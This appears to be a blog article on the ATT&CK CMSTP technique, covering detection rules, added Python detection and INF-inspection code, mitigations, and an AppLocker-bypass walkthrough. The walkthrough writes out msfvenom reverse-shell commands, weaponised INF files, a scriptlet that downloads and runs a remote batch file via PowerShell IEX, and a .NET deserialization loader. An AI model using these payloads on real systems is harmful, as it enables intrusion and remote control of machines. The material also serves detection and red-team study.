ATT&CK: CMSTP


Preface

ATT&CK is a large knowledge matrix. This article picks out one small knowledge point from that matrix and expands on it.

CMSTP

The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile used for remote access connections.

Adversaries may supply CMSTP.exe with an INF file infected with malicious commands. Similar to Regsvr32 / "Squiblydoo", CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. Because CMSTP.exe is a legitimate, signed Microsoft application, this execution may also bypass AppLocker and other whitelisting defenses.

CMSTP.exe can also be abused to bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.

Procedure examples

Name |Description
----|:----:
Cobalt Group |Cobalt Group has used the command cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.
MuddyWater|MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.


Mitigations

Mitigation |Description
----|:----:
Disable or remove feature or program |CMSTP.exe may not be necessary in a given environment (unless it is used for VPN connection installation).
Execution prevention |If CMSTP.exe is not required for a given system or network, consider using application whitelisting configured to block execution of CMSTP.exe to prevent potential abuse by adversaries.

Detection

Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with the prior history of known-good arguments and loaded files to identify anomalies and potential adversary activity.

Sysmon events can also be used to identify potential abuse of CMSTP.exe. The detection strategy may depend on the specific adversary procedure, but potential rules include:

To detect the loading and execution of local/remote payloads: Event 1 (process creation) where ParentImage contains CMSTP.exe, and/or Event 3 (network connection) where Image contains CMSTP.exe and DestinationIP is external.
To detect the User Account Control bypass via the auto-elevated COM interface: Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll, and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor events such as process creation (Sysmon Event 1) that involve the auto-elevated CMSTP COM interfaces, such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
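As an added example (not from the original article or from MITRE), the rules above applied in Python to a handful of constructed Sysmon events. The sample records, the RFC 1918 definition of "internal", and the assumption that the COM CLSID appears in the surrogate process's command line are mine, not the page's.

```python
import ipaddress

# Auto-elevated COM interfaces named in the detection section (CLSID -> name).
ELEVATED_CLSIDS = {"3E5FC7F9-9A51-4367-9063-A120244FBEC7": "CMSTPLUA",
                   "3E000D72-A845-4CD9-BD83-80C07C3B881F": "CMLUAUTIL"}
# "Internal" is approximated as RFC 1918 plus loopback (an assumption; adjust per site).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def triage(ev):
    """Return the names of the rules one Sysmon event matches (empty = no match)."""
    hits, eid = [], ev["EventID"]
    image, parent = ev.get("Image", "").lower(), ev.get("ParentImage", "").lower()
    if eid == 1 and parent.endswith("\\cmstp.exe"):          # payload spawned by cmstp
        hits.append("child-of-cmstp")
    if eid == 3 and image.endswith("\\cmstp.exe") and is_external(ev["DestinationIp"]):
        hits.append("cmstp-external-connection")              # remote payload fetch
    if eid == 10 and "cmlua.dll" in ev.get("CallTrace", "").lower():
        hits.append("cmlua-in-calltrace")                     # UAC-bypass indicator
    if eid in (12, 13) and "cmmgr32.exe" in ev.get("TargetObject", "").lower():
        hits.append("cmmgr32-registry")                       # UAC-bypass indicator
    if eid == 1:  # assumed: the CLSID shows up in the COM surrogate's command line
        cmd = ev.get("CommandLine", "").upper()
        hits += ["com-" + n.lower() for c, n in ELEVATED_CLSIDS.items() if c in cmd]
    return hits

# Constructed sample events (not real telemetry); field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami",
     "ParentImage": r"C:\Windows\System32\cmstp.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\cmstp.exe", "DestinationIp": "10.0.0.2"},
    {"EventID": 3, "Image": r"C:\Windows\System32\cmstp.exe", "DestinationIp": "203.0.113.5"},
    {"EventID": 10, "Image": r"C:\Windows\System32\cmstp.exe",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\CMLUA.dll+1a2b"},
    {"EventID": 13, "Image": r"C:\Windows\System32\cmstp.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Connection Manager\CMMGR32.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\DllHost.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

def triage_all(events=SAMPLE_EVENTS):
    return [triage(e) for e in events]
```

Note that the second sample (cmstp.exe connecting to 10.0.0.2, the lab address used later in this article) produces no hit: the "external destination" rule does not cover a payload staged on the internal network, so a baseline of cmstp.exe's normal destinations is still needed.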

Attack walkthrough (AppLocker bypass – CMSTP)

CMSTP is the binary associated with the Microsoft Connection Manager Profile Installer. It accepts INF files, which can be weaponized with malicious commands to execute arbitrary code in the form of scriptlets (SCT) and DLLs. It is a trusted Microsoft binary located in the following two Windows directories.

~~~
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
~~~
AppLocker's default rules allow execution of binaries in these folders, so it can be used as a bypass method. Oddvar Moe originally discovered that this binary could be used to bypass AppLocker and UAC and published his research on his blog.

DLL
The Metasploit Framework can be used to generate a malicious DLL file via msfvenom.

~~~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll > 1.dll
~~~

The RegisterOCXSection of the INF file needs to contain the local path or WebDAV location of the malicious DLL file for remote execution.


~~~
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection

[RegisterOCXSection]
C:\Users\test.PENTESTLAB\1.dll

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="manre"
ShortSvcName="manre"
~~~

When the malicious INF file is supplied to cmstp, the code executes in the background.

~~~
cmstp.exe /s cmstp.inf
~~~


A Meterpreter session opens from the DLL execution.


SCT

In addition to DLL files, cmstp can also run SCT files, which extends the usefulness of this binary during red team operations. Nick Tyrer first demonstrated this capability on Twitter.

Nick Tyrer also wrote a script named powersct.sct that can serve as an alternative for executing PowerShell commands when native PowerShell is blocked. The UnRegisterOCXSection needs to contain the URL of the scriptlet. The final INF file needs to contain the following:

~~~
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="manre"
ShortSvcName="manre"
~~~

Attached: powersct.sct

~~~
<?xml version="1.0" encoding="utf-8"?>

<![CDATA[function setversion() {
var shell = new ActiveXObject('WScript.Shell');
ver = 'v4.0.30319';
try {
shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319');
} catch(e) {
ver = 'v2.0.50727';
}
shell.Environment('Process')('COMPLUS_Version') = ver;
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "<base64 blob of a serialized .NET assembly, omitted>";
var entry_class = 'TestClass';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);

} catch (e) {
debug(e.message);
}]]>

~~~

After the INF file executes, a new window opens that allows the user to execute PowerShell commands.

~~~
cmstp.exe /s cmstp.inf
~~~


Code can also be executed by using a scriptlet that invokes a malicious executable. The INF file needs to contain the remote location of the script.

~~~
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://192.168.73.1/manre.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="manre"
ShortSvcName="manre"
~~~
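An added example, not part of the original article or the pentestlab write-up it follows: a small INF inspector that parses the sections and flags the RegisterOCXs/UnRegisterOCXs patterns used in the three INF files above (scrobj.dll entries, URL or UNC sources, and OCX paths outside the Windows directory). The INF texts it runs on are constructed, with placeholder paths.

```python
import re

# Constructed INF samples modelled on the ones in the article (placeholder paths).
def make_inf(directive, section, entry):
    return (f"[version]\nSignature=$chicago$\nAdvancedINF=2.5\n\n"
            f"[DefaultInstall_SingleUser]\n{directive}={section}\n\n[{section}]\n{entry}\n")

DLL_INF = make_inf("RegisterOCXs", "RegisterOCXSection", r"C:\Users\someuser\1.dll")
WEBDAV_INF = make_inf("RegisterOCXs", "RegisterOCXSection", r"\\10.0.0.2\share\1.dll")
SCT_INF = make_inf("UnRegisterOCXs", "UnRegisterOCXSection",
                   "%11%\\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct")
BENIGN_INF = "[version]\nSignature=$chicago$\n\n[DefaultInstall_SingleUser]\nCopyFiles=Files\n"

def parse_inf(text):
    """Minimal INF reader: {section name: [non-empty lines]}; ';' starts a comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections

OCX_DIRECTIVES = ("RegisterOCXs", "UnRegisterOCXs")

def inspect_inf(text):
    """Return (directive, pattern, entry) findings for OCX entries matching the abuse patterns."""
    findings, sections = [], parse_inf(text)
    for name, lines in sections.items():
        if not name.lower().startswith("defaultinstall"):
            continue
        for line in lines:
            key, _, target = (p.strip() for p in line.partition("="))
            if key not in OCX_DIRECTIVES:
                continue
            for entry in sections.get(target, []):
                e = entry.lower()
                if "scrobj.dll" in e:                    # scriptlet (SCT) execution
                    findings.append((key, "scrobj", entry))
                if re.search(r"https?://|\\\\", e):      # URL or UNC/WebDAV source
                    findings.append((key, "remote", entry))
                elif not e.startswith(("%10%", "%11%", "c:\\windows\\")):
                    findings.append((key, "non-system-path", entry))
    return findings
```

The path check is deliberately coarse: a legitimate profile INF normally registers nothing at all, so any OCX entry at all under DefaultInstall_SingleUser deserves a look, and the three patterns only rank which ones to look at first.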

Attached: manre.sct

~~~
<?xml version="1.0"?>

<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell -c \"IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.73.1:808/1.bat'))\"");
]]>
~~~
Since this is arbitrary code execution, here I simply spawn a reverse shell (1.bat was generated with msfvenom).
Under the hood it is just a call to wscript.shell.run() that executes a system command.

~~~
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.73.1 lport=44444 > 1.bat
~~~

Run the cmstp command.


A shell is obtained.


Conclusion

The CMSTP binary can be used to bypass AppLocker restrictions and execute code. CMSTP requires an INF file and, when executed, generates CMP and CMS files, which are Connection Manager settings files. Both are essentially text files and are unlikely to trigger any alerts. Therefore, if the cmstp.exe binary cannot be blocked by AppLocker rules, these two files should be monitored as indicators of compromise.

Closing remarks

Everyone knows ATT&CK; it is a treasure trove of information security knowledge. The knowledge is there, and I plan to expand on each small knowledge point in ATT&CK, one at a time. I hope this encourages you to do the same.

Reference links

~~~
https://attack.mitre.org/techniques/T1191/
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/
https://msitpros.com/?p=3960
~~~
